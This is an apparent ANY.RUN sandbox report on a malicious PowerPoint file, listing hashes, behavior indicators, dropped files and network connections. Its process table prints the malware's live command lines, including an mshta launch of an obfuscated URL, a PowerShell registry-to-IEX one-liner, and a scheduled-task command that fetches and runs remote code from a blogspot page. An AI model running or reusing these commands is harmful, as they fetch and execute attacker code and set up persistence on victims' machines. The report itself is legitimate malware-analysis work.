analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

18cbe831822afef5095d89874bbd2f77.ppt

Full analysis: https://app.any.run/tasks/082e4619-ab77-4e0c-ba65-677a7650130c
Verdict: Malicious activity
Analysis date: September 29, 2020, 22:42:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.ms-powerpoint
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Matters, Keywords: elements, Last Saved By: Master Mana, Revision Number: 5, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 06:46, Create Time/Date: Thu Sep 24 22:54:19 2020, Last Saved Time/Date: Thu Sep 24 23:01:06 2020, Number of Words: 0
MD5:

18CBE831822AFEF5095D89874BBD2F77

SHA1:

DE5908CFF3B04006FBBBF4CDC12B56BC108C419A

SHA256:

E3F198D4F0984FA49B890006E2D9F4ADAE221D56D725471BBCBA81564F4BC2B1

SSDEEP:

768:KHRmd650cCBC3Ygu0jOXRvqX3H2z00RLxcjo:KHRmcKX7iH240VJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • POWERPNT.EXE (PID: 2780)
    • Unusual execution from Microsoft Office

      • POWERPNT.EXE (PID: 2780)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 2076)
    • Changes settings of System certificates

      • mshta.exe (PID: 2076)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2076)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 996)
  • SUSPICIOUS

    • Checks supported languages

      • POWERPNT.EXE (PID: 2124)
      • POWERPNT.EXE (PID: 2780)
    • Reads Internet Cache Settings

      • mshta.exe (PID: 2076)
    • Executed via WMI

      • powershell.exe (PID: 3272)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2076)
    • PowerShell script executed

      • powershell.exe (PID: 3272)
    • Creates files in the user directory

      • powershell.exe (PID: 3272)
  • INFO

    • Manual execution by user

      • POWERPNT.EXE (PID: 2780)
    • Creates files in the user directory

      • POWERPNT.EXE (PID: 2780)
    • Reads Microsoft Office registry keys

      • POWERPNT.EXE (PID: 2780)
      • POWERPNT.EXE (PID: 2124)
    • Reads internet explorer settings

      • mshta.exe (PID: 2076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.pps/ppt | Microsoft PowerPoint document (79.7)

EXIF

FlashPix

CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
Title: -
Author: Matters
Keywords: elements
LastModifiedBy: Master Mana
RevisionNumber: 5
Software: Microsoft Office PowerPoint
TotalEditTime: 6.8 minutes
CreateDate: 2020:09:24 21:54:19
ModifyDate: 2020:09:24 22:01:06
Words: -
ThumbnailClip: (Binary data 43336 bytes, use -b option to extract)
CodePage: Windows Latin 1 (Western European)
PresentationTarget: Widescreen
Bytes: -
Paragraphs: -
Slides: -
Notes: -
HiddenSlides: -
MMClips: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Arial
  • Calibri
  • Calibri Light
  • Office Theme
HeadingPairs:
  • Fonts Used
  • 3
  • Theme
  • 1
  • Slide Titles
  • 0
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
5
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powerpnt.exe no specs powerpnt.exe no specs mshta.exe powershell.exe no specs schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2124"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\admin\Desktop\18cbe831822afef5095d89874bbd2f77.ppt.pps"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Exit code:
0
Version:
14.0.6009.1000
2780"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\Desktop\18cbe831822afef5095d89874bbd2f77.ppt"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Version:
14.0.6009.1000
2076mshta https://%909123id%909123id%909123id%909123id%909123id%909123id%[email protected]\das6d78q3ehjgdbnsavdbnzcC:\Windows\system32\mshta.exe
POWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3272powershell ((gp HKCU:\Software).juggga)|IEXC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
996"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://madarjaaatresearchers.blogspot.com/p/elevated6666.html""\"", 0 : window.close"\")C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 541
Read events
1 294
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
14
Text files
11
Unknown types
8

Dropped files

PID
Process
Filename
Type
2124POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\CVRAB83.tmp.cvr
MD5:
SHA256:
2780POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\CVR18A0.tmp.cvr
MD5:
SHA256:
2076mshta.exeC:\Users\admin\AppData\Local\Temp\TarCD5.tmp
MD5:
SHA256:
2076mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5ABbinary
MD5:1E5056D8F8B7C140EEF5C15B35E1E24A
SHA256:2FB42393AB3227431EA37E5B2406444C8F6309450A4EAFC8229EF7001E23F4BD
2076mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\das6d78q3ehjgdbnsavdbnzc[1].htmhtml
MD5:F237D98E30B1FDBB809E59E5388D8101
SHA256:8125AFF31BBCD44F8F3DD840B9621A3531DEC0C41490F81E3926AA1BFF84F6AC
2780POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:C4C9DEC575F1F1E4A98E83AD88CF238D
SHA256:AB790A6F5EB99C01393157CD05874DAA81C05C1E1A8A2CEF270E833399547D70
2780POWERPNT.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:229712F063FC720B9A179D343F698E56
SHA256:7ACBA7C9CAFF9AE3B39191652934E16A8E4EC79B261BC224056165F504E7A525
2076mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\error[1]
MD5:
SHA256:
2076mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\error[1]
MD5:
SHA256:
2076mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\elevated6666[1].htmhtml
MD5:49219707A511BF0153FE9191E7460893
SHA256:17B7B6010BD5F6B5F5136083A782B12E972FBFCD0A5F77017CFF14AF8976B7E3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
10
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2076
mshta.exe
GET
200
142.250.74.227:80
http://ocsp.pki.goog/gts1o1core/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQCMfxdJkM%2FCMwIAAAAAektV
US
der
472 b
whitelisted
2076
mshta.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY%2Bsl%2Bj4yzQuAcL2oQno5fCgQUUWj%2FkK8CB3U8zNllZGKiErhZcjsCEAt2bSBUjvsrlVzk6sKUDkk%3D
US
der
471 b
whitelisted
2076
mshta.exe
GET
200
142.250.74.227:80
http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D
US
der
468 b
whitelisted
2076
mshta.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D
US
der
471 b
whitelisted
2076
mshta.exe
GET
200
142.250.74.227:80
http://ocsp.pki.goog/gts1o1core/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEFz6V9fcgk7eCAAAAABXoJg%3D
US
der
471 b
whitelisted
1052
svchost.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2076
mshta.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2076
mshta.exe
172.217.22.137:443
www.blogger.com
Google Inc.
US
unknown
2076
mshta.exe
142.250.74.227:80
ocsp.pki.goog
Google Inc.
US
whitelisted
2076
mshta.exe
67.199.248.17:443
j.mp
Bitly Inc
US
shared
2076
mshta.exe
172.217.22.129:443
madarjaaatresearchers.blogspot.com
Google Inc.
US
whitelisted
2076
mshta.exe
216.58.204.105:443
resources.blogblog.com
Google Inc.
US
unknown
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2076
mshta.exe
216.58.214.77:443
accounts.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
j.mp
  • 67.199.248.17
shared
ocsp.digicert.com
  • 93.184.220.29
whitelisted
madarjaaatresearchers.blogspot.com
  • 172.217.22.129
whitelisted
ocsp.pki.goog
  • 142.250.74.227
whitelisted
www.blogger.com
  • 172.217.22.137
shared
resources.blogblog.com
  • 216.58.204.105
whitelisted
accounts.google.com
  • 216.58.214.77
shared
google.com
  • 216.58.215.46
whitelisted

Threats

No threats detected
No debug info